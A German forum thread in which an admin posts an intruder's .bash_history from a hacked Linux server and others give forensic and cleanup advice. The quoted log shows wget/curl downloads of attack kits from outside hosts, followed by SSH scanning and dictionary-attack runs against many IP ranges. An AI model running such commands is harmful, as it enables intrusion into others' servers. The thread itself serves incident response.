server gehackt

[LouCypher]

hab hier einen linux server bei dem ein ftp zugang gehackt wurde in der .bash_history im home verzeichnis des ftp users fand ich nun folgende commands:

Zitat:

w
passwd
uname -a
exit
/sbin/ifconfig -a
screen -x
ps x
cd /tmp
ls -a
w
last
ps x
ls a
ls -a
cd .webmin/
ls -a
cd ..
cd "_"
cd "_ "
cd "_ "
ls -all
cd " _ "
ls -a
cd .x
cd whiper/
ls -a
cat vuln.txt
cat pass_file
ls -a
cat scan
ls -a
cd .
ls -a
cd ..
ls -a
exit
w
cat /usr/include/gpm2.h
/sbin/ifconfig -a
cd /var/tmp
wget http://octav.netfast.org/w.tgz
curl -O http://octav.netfast.org/w.tgz
wget http://octav.netfast.org/w.tgz
ls
php -v
php -v
uname -a
w
cat /proc/cpuinfo
cd /tmp
wget patra.xhost.ro/prost.tgz
tar xvf prost.tgz
rm -rf prost.tgz
cd sshscan
./start 213.129
cd ..
rm -rf sshscan
wget ciobex.xhost.ro/scani.tgz
tar xzvf scani.tgz
tar xvf scani.tgz
rm -rf scani.tgz
cd rai
ls
./start 213.129
./start 216.32; ./start 216.39
./start 200.55
+
./start 213.212
./start 212.8
./start 217.112
cd /tmp
ls
cd rai
./start 193.3
./start 193.1
./start 193.4
./start 193.5
./start 193.7
./start 193.8
./start 193.10
./start 193.15; ./start 212.41; ./start 212.42; ./start 212.43; ./start 212.44; ./start 212.45; ./start 212.46; ./start 212.47
./start 212.56; ./start 212.57; ./start 212.58; ./start 212.59; ./start 212.60
.
.
a
w
./start 212.61; ./start 212.62; ./start 212.63; ./start 212.64; ./start 212.65; ./start 212.66; .,/start 212.67; ./start 212.68; ./start 212.69; ./start 212.70; ./start 212.71; ./start 212.72; ./start 212.73
+
./start 212.75; ./start 212.76; ./start 212.77
rm -rf vuln.txt
./start 212.81; ./start 212.82; ./start 212.83
./start 212.84; ./start 212.85; ./start 212.86
cd /tmp
ls
cd rai
ls
rm -rf vuln.txt
ls
./start 212.85

als linux noob kann ich damit nicht viel anfangen, aber ich geh mal davon aus das dies die letzten eingaben des eindringlings waren. Kann mir jemand sagen ob da irgendwas drinsteht das man nachverfolgen sollte? Offensichtlich wurde da ein virus installiert kann mir wer dazu sagen, eventuell auch wie ich ihn entfernen? Angeblich handelt es sich um den Linux.RST.B-1 virus (meint mein copfilter) aber zu dem find ich nichts.

[colossus]

Eine einmal kompromittierte Box kannst Du eigentlich nur "from scratch" neu aufsetzen. Alles andere ist hoechstens zweifelhaft sauber.

(Und die verantwortliche Luecke fuer das erste Rooten solltest du natuerlich zumachen )

[LouCypher]

mich würd nur interessieren was genau da abgelaufen ist. Kann ich die gelöschten objekte zb. vuln.txt und vor allem, die verzeichnisse rai und sshscan wiederherstellen?

Das ganze scheint ja kein script gewesen zu sein weil da ja auch tippfehler drin sind. Wie der typ reingekommen ist kapier ich nicht werd ich vermutlich auch nie rausfinden. Hab aber mittlerweilen mal alle ip ranges aus rumänien gesperrt von denen eine ip adresse beteiligt war.

Das erste programm (prost/shhscan) scannt scheinbar nach ssh servern und und das 2. (scani/rai) macht eine dicionary attacke, seh ich das richtig?

Was aber macht w.tgz, das prog wird nur gesaugt aber nicht entpackt und installiert, checkt das wer?

[Dumdideldum]

du solltest in Betracht ziehen, dass auch die bash_history manipuliert wurde.

Soweit ich das seh wurde der Root account nicht kompromittiert (vorausgesetzt, bash_history wurde nicht gefaked) - nach der Einsicht der heruntergeladenen Archive ist es sowohl ein scheinbar auf webmin abzielendes Exploit -> siehe http://securitydot.net/vuln/exploits...7885/vuln.html und ein bruteforce Gschichtl um andere ssh-Server zu knacken ---> scani.tgz.

Was das Problem war wirst du aber wahrscheinlich nicht über die .bash_history rausfinden, sondern über den Zugang, den er für sich ausgenutzt hat.

Also alle Logs durchsehen, Apache, SSH und FTP Server - und WWI was noch alles drauf rumläuft.

Da wird höchstwahrscheinlich irgendeine Version eines Daemons kränkeln - oder sind alle Daemons up to date ?

[Sloter]

Bist du dir sicher das es über FTP war und nicht über http?
grep include /var/log/apache/access.log
grep wget /var/log/apache/access.log
ls -a /tmp wirst du sicher auch etwas finden

Kontrollieren ob der User nicht Rootrechte hat und ob Prozesse versteckt sind.
Meistens hilft aber nur eine Neuinstallation, weil du sicher irgendwo jetzt ein Backdoor hast.

Sloter

[callas]

war das ein proftp ? da gibts eine aktuelle Sicherheitslücke die remote usern root Zugriff geben kann.

[frankenheimer]

hat nichts mit proftp oder ftp zu tun. Das war eine Vulnerability eines php scripts. Nachdem Apache als setuid apache, der Masterprozess aber als root läuft wurde dein Server mit einem Script gehackt. Danach segfaultet ein Childprozess und ...
a rootkit was born. Der Prozess wird übernommen. Schau mal nach "long lost child came home" in den apache logfiles.
Schaue auch mal mit lsattr in den kompromitierten Directories nach. Auf jedem fall neu installieren. Php ohne register globals verwenden , oder noch besser mit mod-fastcgi als user laufen lassen. Such einfach nach php4 und php5 und mod_fastcgi.
Lg. Fhmer

[tivise]

Hmmm...also das ist hochwertiger Stoff!!!

Man sollte in Erwähgung ziehen das ein ADMIN diesen Beitrag zensieren soll....

[citizen428]

Zitat:

Original geschrieben von tivise
Man sollte in Erwähgung ziehen das ein ADMIN diesen Beitrag zensieren soll....

Welchen und warum?

[Stefan Söllner]

Vermutlich meint er, dass es eine Anleitung ist, einem Server etwas böses anzutun.

Ein jeder weiß auch, dass es eine strafbare Handlung ist und meinerseits zivil- als auch strafrechtlich in Grund und Boden geklagt wird.

Weiterhin es ein Muss für einen Serveradmin ist, zu wissen, wie, warum ein Server kompromittiert wurde. Das bedeutet auch, dass dies öffentlich geschehen kann um andere Admins zu sensibilisieren.
Insbesonderen den Noobies im R00t-Geschäft, die auch hier posten und fragen ...

Von daher sollte man diesen Beitrag als Sticky festpappen.